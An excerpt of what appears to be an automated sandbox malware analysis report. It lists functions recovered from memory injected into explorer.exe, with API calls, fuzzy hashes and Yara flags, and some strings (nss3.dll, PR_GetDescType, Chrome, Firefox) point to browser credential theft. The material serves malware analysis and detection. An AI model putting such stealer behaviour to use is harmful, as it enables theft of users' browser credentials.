                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824A3AD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction ID: 28a7399a7cb15984ce9f096a6fc23d2565577b3f2bc5395ed11871e2abc2b69a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35210A146BCEE98EE31E677C44943353EC5EB5B247F1860EDD487CB256E9A588438321
                                                                                                                                                                                                                        Function 0E0AA361 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AA37A
                                                                                                                                                                                                                          • Part of subcall function 0E09F0F5: _getptd_noexit.LIBCMT ref: 0E09F0F9
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0AA386
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AA3AD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction ID: 506b48ef9f566cf84339702f5a1d3d257edaf07f5165c14db06203181076e741
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A214C31B2DACD8EE75A6BBC44843393AE5EB9B145F1C44E9E682CF196D9658C42C301
                                                                                                                                                                                                                        Function 0DFCF53E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _getptd.LIBCMT ref: 0DFBE0F1
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _inconsistency.LIBCMT ref: 0DFBE0FF
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _getptd.LIBCMT ref: 0DFBE104
                                                                                                                                                                                                                          • Part of subcall function 0DFBE0E4: _inconsistency.LIBCMT ref: 0DFBE120
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFCF58B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFCF591
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFCF5A4
                                                                                                                                                                                                                          • Part of subcall function 0DFBE174: _getptd.LIBCMT ref: 0DFBE17D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction ID: ade5cf35c5b79664b8eda738db9bad755f9450d112cc877e37024f05ace112c9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BF0367294564289C734AF39D9402BC3365EB49B59F1AE939DF894A704DF20C9A1C341
                                                                                                                                                                                                                        Function 0E12F53E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _getptd.LIBCMT ref: 0E11E0F1
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _inconsistency.LIBCMT ref: 0E11E0FF
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _getptd.LIBCMT ref: 0E11E104
                                                                                                                                                                                                                          • Part of subcall function 0E11E0E4: _inconsistency.LIBCMT ref: 0E11E120
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E12F58B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E12F591
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E12F5A4
                                                                                                                                                                                                                          • Part of subcall function 0E11E174: _getptd.LIBCMT ref: 0E11E17D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction ID: 6bd9d15e2f27c8509b166e6ee7ff9b31eb8259b8537d497294d7d9f8723687c2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F03C7274066189DB24EF71DC802AC23A4F74EB59F195939DE895B708DF30C8E2C381
                                                                                                                                                                                                                        Function 0FF6F53E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _getptd.LIBCMT ref: 0FF5E0F1
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _inconsistency.LIBCMT ref: 0FF5E0FF
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _getptd.LIBCMT ref: 0FF5E104
                                                                                                                                                                                                                          • Part of subcall function 0FF5E0E4: _inconsistency.LIBCMT ref: 0FF5E120
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0FF6F58B
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF6F591
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF6F5A4
                                                                                                                                                                                                                          • Part of subcall function 0FF5E174: _getptd.LIBCMT ref: 0FF5E17D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction ID: 41402435e75e41aaeb5c836c5e153e72def74a3a8fa1c9eddef6fbcb45737eb1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62a835e0aba16e4851fd2400f9784127475756477d2fde903a95893cc5363edf
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58F03C32A4068189CB24AF31EC802AC3368EB49F59F485932DE894A747EF24D995C341
                                                                                                                                                                                                                        Function 0DFBD200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0DFBD20E
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0DFBD21A
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _FF_MSGBANNER.LIBCMT ref: 0DFBDBAC
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _NMSG_WRITE.LIBCMT ref: 0DFBDBB6
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: HeapAlloc.KERNEL32 ref: 0DFBDBD1
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _callnewh.LIBCMT ref: 0DFBDBEA
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _errno.LIBCMT ref: 0DFBDBF5
                                                                                                                                                                                                                          • Part of subcall function 0DFBDB7C: _errno.LIBCMT ref: 0DFBDC00
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFBD263
                                                                                                                                                                                                                          • Part of subcall function 0DFBDC3C: RtlPcToFileHeader.NTDLL ref: 0DFBDCCB
                                                                                                                                                                                                                          • Part of subcall function 0DFBDC3C: RaiseException.KERNEL32 ref: 0DFBDD0A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction ID: 39d468047bd6cc427dad7488c64099bf94cba6db894157e001e6d098506823f6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20F0B45560578B51EE20979ABC103E47355F788354F48C0259E8F0BB28EE38C159CB01
                                                                                                                                                                                                                        Function 0E11D200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0E11D20E
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0E11D21A
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _FF_MSGBANNER.LIBCMT ref: 0E11DBAC
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _NMSG_WRITE.LIBCMT ref: 0E11DBB6
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: HeapAlloc.KERNEL32 ref: 0E11DBD1
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _callnewh.LIBCMT ref: 0E11DBEA
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _errno.LIBCMT ref: 0E11DBF5
                                                                                                                                                                                                                          • Part of subcall function 0E11DB7C: _errno.LIBCMT ref: 0E11DC00
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E11D263
                                                                                                                                                                                                                          • Part of subcall function 0E11DC3C: RtlPcToFileHeader.NTDLL ref: 0E11DCCB
                                                                                                                                                                                                                          • Part of subcall function 0E11DC3C: RaiseException.KERNEL32 ref: 0E11DD0A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction ID: 5bb6a1193f151cc1ffcf29285aa43d28c4ef544f13672c8f277de07bd1895956
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F0B47120178A52DE24DB61F4103956390F789344F480834C99D0BB68EF38C6C9CB01
                                                                                                                                                                                                                        Function 0FF5D200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0FF5D20E
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0FF5D21A
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _FF_MSGBANNER.LIBCMT ref: 0FF5DBAC
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _NMSG_WRITE.LIBCMT ref: 0FF5DBB6
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: HeapAlloc.KERNEL32 ref: 0FF5DBD1
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _callnewh.LIBCMT ref: 0FF5DBEA
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _errno.LIBCMT ref: 0FF5DBF5
                                                                                                                                                                                                                          • Part of subcall function 0FF5DB7C: _errno.LIBCMT ref: 0FF5DC00
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF5D263
                                                                                                                                                                                                                          • Part of subcall function 0FF5DC3C: RtlPcToFileHeader.NTDLL ref: 0FF5DCCB
                                                                                                                                                                                                                          • Part of subcall function 0FF5DC3C: RaiseException.KERNEL32 ref: 0FF5DD0A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction ID: 4707b2cb696cf2102cdc1eed981a2ca4d9f6d2278e5609e3e6e96dfcc3814d56
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1144e60ed6f0a352bcf1b8ec71e5687a7bec389760c6cca63a2bd0904bf84be5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AFF0545160A74B51EF34E750B4507A9A354EB89744F4404359F8D4BF69EE7CD24ACB00
                                                                                                                                                                                                                        Function 0DFBAB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC31
                                                                                                                                                                                                                          • Part of subcall function 0DFBAC00: RtlInitializeCriticalSection.NTDLL ref: 0DFBAC3E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0DFBAB8A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0DFBAB9A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                                                                                                                                                        • API String ID: 1327063136-2530758152
                                                                                                                                                                                                                        • Opcode ID: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction ID: a671e2a95459436f070e1e9fa8052143d47551f6239fa767d15d0f1913463dc5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37F062A4912B07A1EA44DF9AE8513B83365F745794F45D027890B43274DE78C549C361
                                                                                                                                                                                                                        Function 0E11AB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC31
                                                                                                                                                                                                                          • Part of subcall function 0E11AC00: RtlInitializeCriticalSection.NTDLL ref: 0E11AC3E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0E11AB8A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0E11AB9A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                                                                                                                                                        • API String ID: 1327063136-2530758152
                                                                                                                                                                                                                        • Opcode ID: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction ID: d68882f1c081634ad72da117e27ecd3588a9ba45d99983b37eb7cae8eb083ba1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0A4B4612A86A2EB08DB61F8413D423A0FB49B94F804813D90E233B1CF7CC6CAC350
                                                                                                                                                                                                                        Function 0FF5AB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC31
                                                                                                                                                                                                                          • Part of subcall function 0FF5AC00: RtlInitializeCriticalSection.NTDLL ref: 0FF5AC3E
                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0FF5AB8A
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0FF5AB9A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID: PR_GetDescType$nss3.dll
                                                                                                                                                                                                                        • API String ID: 1327063136-2530758152
                                                                                                                                                                                                                        • Opcode ID: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction ID: c634d22d1b292e2395916faf278d42a6ad57bc815281866d4d64be0170bf1c8d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ec8b6d16995e104318f8d6f93db4ea2d038876ffdd0efd53cb35dfc62aaaab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8BF07AB4A11B0B91EB24EF65E8853B42760FF45BC4F941232CA0A83A61DF7CD19BE350
                                                                                                                                                                                                                        Function 0DFBAC00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFA8900: HeapCreate.KERNEL32 ref: 0DFA891D
                                                                                                                                                                                                                          • Part of subcall function 0DFBC210: lstrcpyA.KERNEL32 ref: 0DFBC264
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFBAC31
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFBAC3E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction ID: cc9d7fe79d774ac3c07a6b917f74b546135ac8499fdbc59e48d3217a38987539
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFE07E28911B03A0EA00BBD4FC843A433A5BB98789F818037C90B82270EF7C8659C7A0
                                                                                                                                                                                                                        Function 0E11AC00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0E108900: HeapCreate.KERNEL32 ref: 0E10891D
                                                                                                                                                                                                                          • Part of subcall function 0E11C210: lstrcpyA.KERNEL32 ref: 0E11C264
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0E11AC31
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0E11AC3E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction ID: 7669cea562b2a812abb39ba448804466c36118d74a4775dad49be6ee1b569b7e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AE075B4A11FC195E608FB11F8543D423A4B758705F800812E509223B0DF788699C741
